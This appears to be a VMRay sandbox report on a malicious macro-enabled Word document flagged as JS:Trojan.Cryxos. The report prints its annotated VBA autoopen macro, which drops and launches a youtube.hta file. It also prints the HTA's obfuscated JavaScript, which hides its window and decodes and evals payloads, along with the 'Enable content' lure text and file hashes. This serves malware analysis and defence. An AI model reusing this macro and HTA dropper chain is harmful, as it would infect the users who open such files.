Malicious
Classifications

-

Threat Names

JS:Trojan.Cryxos.7513

Remarks

(0x0200004A): 132 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 19 MB.

File Name C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc
Category Sample File
Type Word Document
Verdict malicious
MIME Type application/vnd.ms-word.document.macroEnabled.12
File Size 33.52 KB
MD5 18499830201cddade8183b8e24fdf30a
SHA1 55c498cf7273cab567f49a00c15ca3316c001215
SHA256 0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
SSDeep 768:JouYXWQ6W02VWnZdw9822zARtrLfxl1Isq:mLmxfcWwkyNLfx4
ImpHash -
Office Information
Keywords ath.ebuTuoy
Creator aqbhmx
Last Modified By Пользователь Windows
Revision 2
Create Time 2021-12-01 11:28:00+00:00
Modify Time 2021-12-01 11:28:00+00:00
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security NONE
Page Count 1
Line Count 55
Paragraph Count 1
Word Count 116
Character Count 9905
Chars With Spaces 10020
ScaleCrop False
SharedDoc False
VBA Macros (2)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Removes the "@1" filler inserted between every character of the document body
' (Replace:=2 is wdReplaceAll), leaving the plain HTA markup shown in the content snippet below.
Function contents()
ActiveDocument.Content.Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2
End Function
' Returns the Keywords document property ("ath.ebuTuoy", i.e. "youTube.hta" reversed)
' and then strips the filler from the body.
Function keywords()
keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value
contents
End Function
' Instantiates the COM object whose ProgID is passed in and uses it to open the
' saved file through explorer; the ProgID comes from the main module.
Public Function s(youDoorNext, youLoad)
Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)
End Function
Macro #2: main
Attribute VB_Name = "main"
' Runs automatically when the document is opened (once macros are enabled).
Public Sub autoopen()
' Output file name is the reversed Keywords property: "youTube.hta".
lovePowGirl = StrReverse(ThisDocument.keywords)
' Saves the cleaned body as plain text (FileFormat:=2 is wdFormatText), which
' produces the dropped youtube.hta listed below.
With ActiveDocument
.SaveAs2 FileName:=lovePowGirl, FileFormat:=2
End With
' "llehs.tpircsw" reversed is "wscript.shell"; the dropped HTA is then executed via explorer.
ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl
End Sub
Document Content Snippet
<@1h@1t@1m@1l@1>@1<@1b@1o@1d@1y@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1k@1a@1r@1o@1l@1Y@1o@1u@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1l@1a@1v@1e@1<@1/@1d@1i@1v@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1t@1u@1b@1e@1G@1i@1r@1l@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1=@1Y@1X@1Y@1y@1B@1C@1Z@1v@1d@1X@1W@1v@1V@1H@1I@19@1A@1i@1b@1l@1d@1H@1I@1B@1N@1G@1d@1p@1Z@1X@1Z@1Y@19@1k@1Y@1q@1V@12@1Y@10@1h@1i@1I@1t@1N@1H@1e@1t@1x@1m@1M@1u@1g@1X@1b@1s@1h@1G@1d@10@1B@1n@1I@1p@1s@1D@1Z@1v@1d@1X@1W@1v@1V@1n@1L@1v@1B@1X@1Z@1u@1h@1i@1I@1H@1V@1E@1V@1i@1w@1C@1I@1i@1g@1G@1d@10@1B@1n@1O@1v@18@1y@1d@1p@15@1m@1c@1l@15@1G@1d@1h@1x@12@1c@1y@1A@1T@1M@13@1I@1m@1L@1j@19@1W@1b@1v@1Q@1X@1Z@1n@1p@13@1L@1R@1J@1z@1N@13@1E@12@1R@13@1Y@10@1a@1O@1l@1D@1c@1B@1N@1W@1Y@1X@1R@1k@1Z@1G@1x@12@1R@1O@1J@1U@1Z@11@1F@1W@1c@1H@1V@1G@1Z@14@1k@12@1L@1i@1F@12@1V@1l@1h@1H@1V@1R@19@12@1R@15@1F@1U@1Q@16@1x@1k@1U@1v@1E@1U@ ...
Extracted Image Texts (1)
Image 1: image1.gif
This document created in previous version of Hicrosoft Office Word To view or edit this document. please click “Enable editing” button on the top bar. and then click “Enable content”
YARA Matches (1)
Rule Name VBA_Obfuscation_ObjectName
Rule Description VBA initializes COM object from long variable name; possible obfuscation
Classification -
Score 2/5
File Name c:\users\rdhj0cnfevzx\documents\~wrd0000.tmp
Category Dropped File
Type HTML
Verdict malicious
Also Known As c:\users\rdhj0cnfevzx\documents\youtube.hta (Dropped File)
MIME Type text/html
File Size 3.26 KB
MD5 55d9eab53d4063a53b6ed05f7b1e75e7
SHA1 e6b4c81676d3ef0d2f7d08a6cc2ad90eb54908c3
SHA256 c7f40608ce8a3dda25c13d117790d08ef757b07b8c2ccb645a27a71adc322fb2
SSDeep 96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8
ImpHash -
AV Matches (2)
Threat Name Verdict
JS:Trojan.Cryxos.7513 malicious
JS:Trojan.Cryxos.7513 malicious
Extracted JavaScripts (4)
JavaScript #1
// Wrapper around ActiveXObject, used by the HTA to instantiate COM objects.
function doorKarolDoor(girlLoveKarol) {
    return (new ActiveXObject(girlLoveKarol));
}
// Reads the inner HTML of an element by id; the page keeps its data in hidden <div>s.
function tubePow(powTubeTube) {
    return (loveDoorLove.getElementById(powTubeTube).innerHTML);
}
function karolDoorKarol(likeLikeLoad) {
    return ('cha' + likeLikeLoad);
}
// Base64 decoder whose alphabet is read from the element 'loveKarolLoad' instead of being hard-coded
// (index 64 is the padding character).
function dowLoadDoor(loadPowPow) {
    var doorTube = tubePow('loveKarolLoad');
    var loveGirlLoad = "";
    var tubeLove, loveLikeLove, loadLoad;
    var powNextKarol, tubeDowDoor, loveLoveDoor, loveYouYou;
    var tubeKarolYou = 0;
    loadPowPow = loadPowPow.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while (tubeKarolYou < loadPowPow.length) {
        powNextKarol = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        tubeDowDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        loveLoveDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        loveYouYou = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));
        tubeLove = (powNextKarol << 2) | (tubeDowDoor >> 4);
        loveLikeLove = ((tubeDowDoor & 15) << 4) | (loveLoveDoor >> 2);
        loadLoad = ((loveLoveDoor & 3) << 6) | loveYouYou;
        loveGirlLoad = loveGirlLoad + String.fromCharCode(tubeLove);
        if (loveLoveDoor != 64) {
            loveGirlLoad = loveGirlLoad + String.fromCharCode(loveLikeLove);
        }
        if (loveYouYou != 64) {
            loveGirlLoad = loveGirlLoad + String.fromCharCode(loadLoad);
        }
    }
    return (loveGirlLoad);
}
// Reverses a string.
function loadKarolLike(likeLoveDow) {
    return likeLoveDow.split('').reverse().join('');
}
// Decoding pipeline: reverse, base64-decode, reverse again.
function loadTubeNext(likeLikeLoad) {
    return (loadKarolLike(dowLoadDoor(loadKarolLike(likeLikeLoad))));
}
function loadLoadGirl(likeLikeLoad, youPowKarol) {
    return (likeLikeLoad.split(youPowKarol));
}
likePowLoad = window;
loveDoorLove = document;
// Moves the HTA window off-screen so nothing is visible to the user.
likePowLoad.moveTo(-10, -10);
// The 'tubeGirl' element holds two "|||"-separated encoded strings (see the document content snippet).
var girlTubeTube = tubePow('tubeGirl').split("|||");
var loveNextLove = loadTubeNext(girlTubeTube[0]);
var karolLoadDoor = loadTubeNext(girlTubeTube[1]);
JavaScript #2
// tubePow('karolYou') yields "lave" (the hidden div in the content snippet); reversed it is "eval",
// so this resolves to window["eval"](girlPow): each decoded string is executed as script.
function nextLovePow(girlPow) {
    likePowLoad[loadKarolLike(tubePow('karolYou'))](girlPow);
}
JavaScript #3
' VBScript statement (Call keyword, colon separator) invoking nextLovePow on both decoded strings.
Call nextLovePow(loveNextLove) : Call nextLovePow(karolLoadDoor)
JavaScript #4
// window.close(): the HTA window is closed once the payloads have run.
likePowLoad['close']();
File Name c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat
Category Modified File
Type Stream
Verdict clean
MIME Type application/octet-stream
File Size 128 Bytes
MD5 cc90851958032b8c8bbb7b24ec6271dd
SHA1 e027ad2ea4049374a3b01af2e3626b667dc816bc
SHA256 c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858
SSDeep 3:Fl:
ImpHash -
File Name image1.gif
Category Embedded File
Type Image
Verdict clean
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\d67a1d0d.gif (Dropped File)
Parent File C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc
MIME Type image/gif
File Size 13.99 KB
MD5 76da3e2154587dd3d69a81fcdb0c7364
SHA1 0f23e27b3a456b22a11d3fbc3132397b0ddc9357
SHA256 f9299ab3483a8f729b2aca2111b46e9952d4491ac66124fec22c1c789ebc3139
SSDeep 384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
ImpHash -
File Name c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.word\~wrd0003.doc
Category Dropped File
Type Unknown
Verdict clean
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
ImpHash -
File Name c:\users\rdhj0cnfevzx\documents\~$outube.hta
Category Dropped File
Type Stream
Verdict clean
MIME Type application/octet-stream
File Size 162 Bytes
MD5 f68972666afc3004f34449817d4f64cd
SHA1 05c7cefa2d6e6aa77963cc516186b1cf988f724e
SHA256 431bbbca757a2a5e6cbc33ee25675b79d39a4a1f3309b7f7077773fbecadf89d
SSDeep 3:fmrc9/XMflUfxdcJHdUYlEe58RIi9C0hX/a5TKAP+:Orc9/8NUnKFmdC0hXS5zP+
ImpHash -
File Name c:\users\public\dowNext.jpg
Category Downloaded File
Type HTML
Verdict clean
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\e5rrlzgr\cab3[1].htm (Downloaded File)
Parent File analysis.pcap
MIME Type text/html
File Size 203 Bytes
MD5 b5ff4c0f214fdf079ae6d835f046b7c5
SHA1 fc1f09a696c92d366e4868a35a5afa79129b12be
SHA256 aaf04ecb4c67de5a7833184f5abeec5f48a2fc17bb8167637a421596e00c7e4c
SSDeep 6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T
ImpHash -
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.